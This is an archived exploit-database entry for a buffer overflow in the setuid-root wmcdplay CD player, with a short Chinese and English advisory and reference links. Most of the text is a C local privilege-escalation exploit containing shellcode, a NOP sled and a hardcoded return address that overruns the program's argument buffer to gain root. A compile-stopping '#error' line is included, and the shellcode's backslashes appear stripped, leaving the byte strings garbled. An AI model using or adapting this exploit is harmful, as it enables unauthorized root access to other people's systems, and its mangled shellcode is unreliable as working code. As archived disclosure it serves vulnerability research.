https://www.exploit-db.com/exploits/19802
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200003-021

WindowMaker桌面wmcdplayCDplayer程序存在缓冲区溢出漏洞。本地用户借助超长参数可以提升根特权。

source: http://www.securityfocus.com/bid/1047/info

wmcdplay is cdplayer generally used with the WindowMaker X11 window-manager on unix systems. While wmcdplay is rarely installed at all by default, when it is installed it is typically set setuid root. wmcdplay is vulnerable to a buffer overflow attack due to lack of bounds checking on an argument it is passed. As a result, a local user can elevate their priviliges to root through overruning the stack and executing arbitrary code with the effective user-id of the process (root).

/*** Halloween 4 local root exploit for wmcdplay. Other distros are
 *** maybe affected as well.
 *** (C) 2000 by C-skills development. Under the GPL. 
 *** 
 *** Bugdiscovery + exploit by S. Krahmer & Stealth.
 ***
 *** This exploit was made (possible by|for) the team TESO and CyberPsychotic, the
 *** OpenBSD-freak. :-) Greets to all our friends. You know who you are.
 *** 
 ***
 *** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
 ***
 *** other advisories and kewl stuff at:
 *** http://www.cs.uni-potsdam.de/homepages/students/linuxer
 ***
 ***/
#include <stdio.h>

/* The shellcode can't contain '/' as wmcdplay will exit then.
 * So i used Stealth's INCREDIBLE hellkit to generate these code! :-)
 */
char shell[] =
"xebx03x5exebx05xe8xf8xffxffxffx83xc6x0dx31xc9xb1x68x80x36x01x46xe2xfa"
"xeax09x2ex63x68x6fx2ex72x69x01x80xedx66x2ax01x01"
"x54x88xe4x82xedx1dx56x57x52xe9x01x01x01x01x5ax80xc2xbbx11"
"x01x01x8cxbax2bxeexfexfex30xd3xc6x44xfdx01x01x01x01x88x7c"
"xf9xb9x16x01x01x01x88xd7x52x88xf2xccx81x8cx4cxf9xb9x0ax01"
"x01x01x88xffx52x88xf2xccx81x5ax5fx5ex88xedx5cxc2x91x91x91"
"x91x91x91x91x91x91x91x91x91x91x91x91";

/* filename-buffer plus ret + ebp - defaultpath 
 */
#define buflen (256+8 - 28)
#error "no kids please"

int main(int argc, char **argv)
{						       		
	char *wm[] = {
		"/usr/X11R6/bin/wmcdplay", 
		"-f", 
		"-display", "0:0", /* one might comment this if already running on X; remotely you can
				    * give your own server
		                    */
		0
	};
	
	char boom[buflen+10];
	int i = 0, j = 0, ret =  0xbffff796;	/* this address works for me */

	memset(boom, 0, sizeof(boom));
	memset(boom, 0x90, buflen);
	if (argc > 1)
		ret += atoi(argv[1]);
	else
		printf("You can also add an offset to the commandline. 40 worked for me on the console.n");
	for (i = buflen-strlen(shell)-4; i < buflen-4; i++)
		boom[i] = shell[j++];
	*(long*)(&boom[i]) = ret; 
	
	printf("Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxern"
	       "Respect other users privacy!n");
	       
	execl(wm[0], wm[0], wm[1], boom, wm[2], wm[3], 0);
	return 0;
}

来源:BID
名称:1047
链接:http://www.securityfocus.com/bid/1047
来源:BUGTRAQ
名称:20000311TESOadvisory–wmcdplay
链接:http://archives.neohapsis.com/archives/bugtraq/2000-03/0107.html